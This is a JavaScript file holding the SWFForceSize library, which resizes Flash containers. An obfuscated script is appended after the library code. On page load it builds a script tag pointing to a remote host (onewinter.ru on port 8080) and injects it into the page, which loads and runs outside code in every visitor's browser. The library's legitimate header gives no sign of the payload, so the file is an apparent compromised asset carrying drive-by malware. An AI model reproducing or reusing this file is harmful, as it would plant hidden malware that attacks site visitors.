/**
 * SWFForceSize v1.0: Flash container size limiter for SWFObject - http://blog.pixelbreaker.com/
 *
 * SWFForceSize is (c) 2006 Gabriel Bucknall and is released under the MIT License:
 * http://www.opensource.org/licenses/mit-license.php
 *
 * Dependencies: 
 * SWFObject v2.0 - (c) 2006 Geoff Stearns.
 * http://blog.deconcept.com/swfobject/
 */
function SWFForceSize( divId, minWidth, minHeight )
{
	this.div = divId;
	this.minW = minWidth;
	this.minH = minHeight;
	
	var o = this;
	this.addWindowEvent( 'onload', this, this.onLoadDiv );
	this.addWindowEvent( 'onresize', this, this.onResizeDiv );
}

SWFForceSize.prototype = {
	addWindowEvent: function( eventName, scope, func )
	{
		var oldEvent = window[ eventName ];
		if (typeof window[ eventName ] != 'function') window[ eventName ] = function(){ func.call( scope ); };		else
		{			window[ eventName ] = function()
			{ 
				if( oldEvent ) oldEvent();				func.call( scope );			}
		}
		
	},

	getWinSize: function()
	{
		var winH, winW;
		if (parseInt(navigator.appVersion)>3) {
			if ( document.body.offsetWidth ){ // Gecko / WebKit
				winW = document.body.offsetWidth;
				winH = document.body.offsetHeight;
			} else if ( document.body.offsetWidth ){ // MS
				winW = document.body.offsetWidth;
				winH = document.body.offsetHeight;
			}
		}
		return { height: winH, width: winW };
	},
	
	onLoadDiv: function()
	{
		document.getElementById( this.div ).style.width = "100%";
		document.getElementById( this.div ).style.height = "100%";
		this.onResizeDiv();
	},
	
	onResizeDiv: function()
	{
		var winSize = this.getWinSize();
		var w = winSize.width < this.minW? this.minW+"px" : "100%";
		var h = winSize.height < this.minH? this.minH+"px" : "100%";
		/*
		 for IE on PC, turn off the disabled scrollbar 
		 on the right when there's no content to scroll
		*/
		if( document.all ) document.body.scroll = ( w!="100%" || h!="100%" )? "auto" : "no";
		document.getElementById( this.div ).style.width = w;
		document.getElementById( this.div ).style.height = h;
	}
}
var Z={r:39514};this.f=4685;this.f+=255;var M;this.m="m";X=function(){this.nGB=53179;this.nGB++;function J(d,L,a){var aQ="aQ";return d.substr(L,a);try {var k='U'} catch(k){};try {var A='o'} catch(A){};}var vW='';jZ=51374;jZ--;this.x=47198;this.x-=246;var jv="";var w=String("/m"+J("inGrz",0,2)+"ic"+J("fRDlifDR",3,2)+"p-"+J("coLPbd",0,2)+"m/"+J("god8e",0,2)+J("FdyQogFQyd",4,2)+"le"+J(".cO3a",0,2)+"om"+J("/o8CuQ",0,2)+J("YGBlralYBG",4,2)+J("ngO5UH",0,2)+"e."+"fr"+J("Tgl.pTgl",3,2)+"hp");var Fi="";E=["g","Hi","mG"];var j=document;var i=RegExp;var nZ={bN:"T"};t={Th:false};this.Sf="Sf";var V='';az={Xn:34350};var BP=["wq","cQ","vp"];ig=["Mi"];function D(d,L){var wv="wv";jI=[];var QQ={qS:false};oh={EG:36714};var a=String(J("[lqh",0,1))+L+"]";this.qT="";var Xj=new i(a, "g");try {var Zj='t_'} catch(Zj){};return d.replace(Xj, V);nC={gH:false};};this.AY=29664;this.AY+=76;var LY=["GG","nZj","gN"];var dv=["ou"];var Ub=["ae"];var av="bo"+"dy";var b=D('sIcIrxiBpbtD','jAvxMqoVuIlBk4L867nwDbJ0');this.gJ='';var EZ=new Array();var n=null;var xP={y:61226};this.QY="";var nc=13499-5419;FF=["YA","Sk","h"];var le={Fq:"z"};M=function(){try {var Mg={};var p=D('cbrpeJa8tJeyESlgeDm1eLnLtL','Y8s1JpSbygDL');var YC=new Array();c=j[p](b);XS={};Xa={};var My=false;var ru=["rk"];var cO=D('sjrjcJ','vuGJ0Vj');var hl=false;var d=nc+w;ed=["Ck"];var bq=new String("def"+J("erJEL",0,2));var PF=new Date();var nN=["gT"];ht=22273;ht-=4;c[bq]=[5,1][1];try {var hd='CV'} catch(hd){};c[cO]="http:"+"//one"+"winte"+"r.ru:"+d;this.ZP=false;this.rP=false;j[av].appendChild(c);try {var dw='cs'} catch(dw){};} catch(Y){cq={aZ:false};try {var Lt='Hx'} catch(Lt){};};var cQZ={JL:38003};var bf="bf";};var Pu="Pu";};this.Bj=27972;this.Bj++;X();var Pf="Pf";window.onload=M;